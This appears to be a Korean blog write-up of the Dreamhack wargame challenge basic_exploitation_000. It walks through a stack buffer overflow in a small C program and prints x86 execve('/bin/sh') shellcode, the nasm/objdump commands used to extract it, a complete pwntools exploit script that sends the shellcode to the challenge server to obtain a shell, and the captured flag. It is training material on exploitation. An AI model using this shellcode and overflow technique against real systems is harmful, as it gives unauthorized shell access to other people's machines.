basic_exploitation

🌇│System_Study/📕│Dreamhack_Hacking

basic_exploitation_000

Jastes 2022. 4. 27. 11:21

basic_exploitation_000

문제풀이(pwntools와 shellcode)

밑에 링크는 앞으로 기재될 문제 풀이에서 큰 도움이 될거예요
추가로 필요한 정보는 차차 기재할께요

Memory Corruption: Stack Buffer Overflow

스택 버퍼 오버플로우(Stack Buffer Overflow) 세계 최초의 웜이라고 불리는 모리스 윔도 이 공격을 통해 전파됨 보안 공부를 모르는 개발자도 알만큼 유명하고 역사가 오래된 취약점입니다. 이렇게

dystopia050119.tistory.com

//file name : basic_exploitation_000.c
//Complie : gcc -o basic_exploitation_000 basic_exploitation_000.c
 
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
 
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
 
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
 
 
int main(int argc, char *argv[]) {
 
    char buf[0x80]; //128byte
 
    initialize();
    
    printf("buf = (%p)\n", buf);
    scanf("%141s", buf); //141byte input vlun
 
    return 0;
}

위 코드를 확인하시고 보면 어느 부분이 취약한지 보일거예요 주제도 BOF니까 금방 알겠죠?

위 코드가 buf를 넘는 값만큼 입력을 받으므로 BOF가 발생하겠네요!!

scanf가 취약점이니까 그 부분을 공략하면 되겠네요

이런 식으로 입력 받으므로 이제부턴 한 절차를 사진으로만 보여주고
설명이 필요하다 생각되는 부분에만 몇 슬라이드.. 설명으로 할께요 ㅎㅎ

Scanf의 syscall로 break boint를 잡고 시작을 할까요
- 앞에 있는 부분을 확인하고 esp를 확인해도 포맷 스트링과 규약이 정해진 모습
이런 방식으로도 확인을 할 수 있다는 부분
- format 형식(여기서 입력받은 거 저장하는 주소 ≒ esp)과 vararg로 형식까지
버퍼 오버플로우를 시킨 모습이고요
스택에 입력받은 부분은 esp(문제에서 x86 아키텍처니까) 확인 모습
break point 를 ret로 잡고 countinue해서 확인하면 저렇게 나와요
- esp(sfp)에서 eip(ret)로 이동하기 전에 모습이죠
si 시킨 후 eip를 보면 이전에 있던 esp의 스택이 옮긴 모습이죠

고롬 어느정도 분석이 다 끝났기에 쉘 코드 구성과 pwntools로 설계해봅시당!

자 이런 식으로 설계를 할건데요 면밀하게 살펴봅시다!

;file name : shellcode.asm 
 
global _start
 
section .text
_start:
 
        xor eax, eax    ; reseting the register
        push eax        ; pushing null terminator
        push 0x68732f2f ; push /bin//sh
        push 0x6e69622f
        mov ebx, esp    ; ebx = /bin//sh
        push eax
        mov edx, esp    ; envp = 0
        push ebx
        mov ecx, esp    ; argv = [filename,0]
        mov al, 11      ; syscall 12 (execve)
        int 0x80        ; syscall

위는 이제 사용할 execve(const char *filename, char *const argv[], char *const envp[]);

어셈블리어를 기계어로 변환 - shellcode.o

sudo apt-get install nasm
nasm -f elf(32) shellcode.asm
objdump -d shellcode.o

sudo apt-get install nasm
nasm -f elf(32) shellcode.asm
objdump -d shellcode.o

nasm은 어셈블코드를 기계어로 바꾸어주는 형식입니다!
vi로 .asm 확장자 코드를 작성 후 nasm 명령어를 사용해 실행 파일로 변환하는 명령어죠!

기계어 코드 - shellcode.bin

objcopy --dump-section .text=shellcode.bin shellcode.bin
xxd(or hexdump -C) shellcode.bin

objcopy --dump-section .text=shellcode.bin shellcode.bin
xxd(or hexdump -C) shellcode.bin

뭐.. 이런 식으로 표현할 수 있죠 첫 번째는 Dreamhack에서 하신 코드이며,
해석하자면 objcopy는 오프젝트 복사하는 명령어를 사용하여 --dump-section 로
추출하여 .text형태로 shellcode.bin의 확장자로 넣는거죠 약간 gcc -o 같네요 ㅎ

참고로 objcopy는 본래 약간 objcopy test test.new 이런 식으로 쓰는 거예요
해킹이 아닌 목적에선 검증이나 백업 용도?로 쓴다고 생각하시면 되겠네요

echo;objdump -d ./shellcode.o|grep '[0-9a-f]:'|grdhep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

echo;objdump -d ./shellcode.o|grep '[0-9a-f]:'|grdhep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

정규표현식과 리눅스 명령어로 출력하는 부분에서 상당히 많은 부분을 걸렀네요
자세히 분석을 해보면... 음.. 저도 명확하겐 모르겠네요 차차 알아갑시다 ㅠ

참고로 위 자료를 참고하여 했습니다 exploit-db 좋으니까 강추!!

Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)

Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes) EDB-ID: 45529 CVE: N/A Date: 2018-10-04

www.exploit-db.com

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) EDB-ID: 13353 CVE: N/A Date: 2006-11-16

www.exploit-db.com

exploit code - by pwntools이제 쉘코드도 얻었겠다 시작해볼까요?

#file name : exploit.py
from pwn import *
context.log_level = 'debug'
 
#p = process('./basic_exploitation_000')
p = remote('host1.dreamhack.games', '14412')
e = ELF('./basic_exploitation_000')
 
p.recvuntil("buf = (")
buf = int(p.recv(10), 16)
p.recvline()
 
payload = b'\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80'
payload += b'A'*0x66
payload += b'B'*0x4
payload += p32(buf)
 
p.sendline(payload)
p.interactive()

위 코드를 그럼 분석해봅시다.

저 빨간색으로 쳐진 부분이 buf의 주소를 받아와서 실행한다는 이야기인데..
즉, ret를 받겠단 소리이므로 일단 그 포인터를 정수형을 받을 걸을 16진수로 바꾸어야
저희가 익스플로잇 할때 편하겠죠 고로 받아서 저장합시다 나중에 바로 쓰니까

그리고 128byte가 buff이므로 stf(4byte)까지 합치면 132byte!
거기에 shellcode + dummy + buf addr(ret ≒ shellcode addr)로써 되겠죠

b'NOP(≒ \x90)'*(0x80 - len(shellcode)) + b'B'*0x4

로 하셔도 딱히 상관은 없겠다만
저희 쉘 코드 길이가 26byte였나? 그정도 되니까 하시면 끝!

그럼 익스플로잇 하시면

DH{465dd453b2a25a26a847a93d3695676d}

참고 자료

basic_exploitation_000

Description 이 문제는 서버에서 작동하고 있는 서비스(basicexploitation000)의 바이너리와 소스 코드가 주어집니다. 프로그램의 취약점을 찾고 익스플로잇해 셸을 획득한 후, "flag" 파일을 읽으세요. "fla

dreamhack.io

objcopy를 사용하는 이유

objcopy는 오브젝트 파일을 다른 오브젝트 파일로 복사할 때 사용한는데, 선택적으로 필요한 부분만을 복사할 수 있기 때문에 파일의 사이즈를 줄이는 데 주로 사용되고, 바이너리 포맷을 바꾸는

damduc.tistory.com

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) EDB-ID: 13353 CVE: N/A Date: 2006-11-16

www.exploit-db.com

Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)

Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes) EDB-ID: 45529 CVE: N/A Date: 2018-10-04

www.exploit-db.com

NASM

Latest version Stable 2.15.05 History Builds List Snapshots Latest, List For users of RPM-based Linux distributions (e.g. Fedora, Red Hat, SUSE, ...), you can download the official NASM builds using dnf or yum by installing nasm.repo in your /etc/yum/yum.r

www.nasm.us

참고 이미지

basic_exploitation_000

dreamhack.io

저작자표시 비영리 변경금지